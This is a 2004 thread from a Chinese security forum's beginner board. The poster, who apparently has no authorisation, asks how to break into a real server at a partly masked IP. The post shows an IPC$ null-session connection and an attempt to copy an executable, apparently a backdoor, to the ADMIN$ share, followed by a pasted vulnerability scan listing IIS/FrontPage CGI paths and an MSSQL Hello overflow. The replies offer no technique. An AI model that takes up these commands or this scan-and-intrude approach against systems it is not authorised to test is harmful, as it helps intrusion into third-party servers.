|
 | 作者: fhchen [fhchen]
 论坛用户 |
登录 |
| E:\>net use \\218.0.*.*\ipc$ "" /user:mail----------------连接成功! 命令成功完成。 E:\>copy wollf.exe \\218.0.*.*\admin$ 拒绝访问 -------------------------------------------------------------------- 这是是不是这个用户:mail 不是Administrator用户组原故? 如果是,那怎么办才能入侵? ------------------------------------------------------------- 还有我又扫描到以下漏洞: 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/_vti_aut/author.dll 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/_vti_adm 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/_vti_aut 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/shtml.dll/_vti_rpc 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/shtml.exe 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/shtml.dll 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/_vti_bin/shtml.dll/nosuch.htm 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/abczxv.htw 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/default.asp 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/default.asp%81 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/main.asp%81 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/null.ida 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/null.idq 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/scripts 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/scripts/samples/search/qfullhit.htw 警告 www (80/tcp) CGI漏洞: http://218.0.*.*/scripts/samples/search/qsumrhit.htw _________________________________________________________________ 漏洞 mssql (1433/tcp) The remote MS SQL server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. ------------------------------------------------------------------ 那台服务器:服务器信息 Level 101]: 操作系统: Windows NT 系统版本: 5.0 注释:"" 主机类型: WORKSTATION SERVER SERVER_NT MASTER_BROWSER ------------------------------------------------------- [网络共享资源列表 Level 1]: "E$": 磁盘 - [默认共享] (System) "IPC$": 进程间通信(IPC$) - [远程 IPC] (System) "ADMIN$": 磁盘 - [远程管理] (System) "VPLOGON": 磁盘 - [Symantec AntiVirus] "C$": 磁盘 - [默认共享] (System) "VPHOME": 磁盘 - [Symantec AntiVirus] ---------------------------------------------------------- 不知道,这样利用这些漏洞----也是在同一个服务器上的. 希望得到你 的指点~!~谢谢? |
| 地主 发表时间: 04-08-03 21:24 |
 | 回复: xingqing [pdboy] 论坛用户 |
登录 |
|
呵呵,楼主是用x-scan扫的吧,漏洞是多,不过关于CGI的漏洞,我也不太会用了.顶顶再说~!!! |
| B1层 发表时间: 04-08-04 03:39 |
 | 回复: hacker521 [hacker521]  论坛用户 |
登录 |
|
晕罗, 这个论坛已经有介绍了,你自己去搜索下吧 [此贴被 无风之夜(hacker521) 在 08月04日19时59分 编辑过] |
| B2层 发表时间: 04-08-04 19:53 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 汗....这么多的漏洞,不知道怎么入侵?希望你能教教小弟?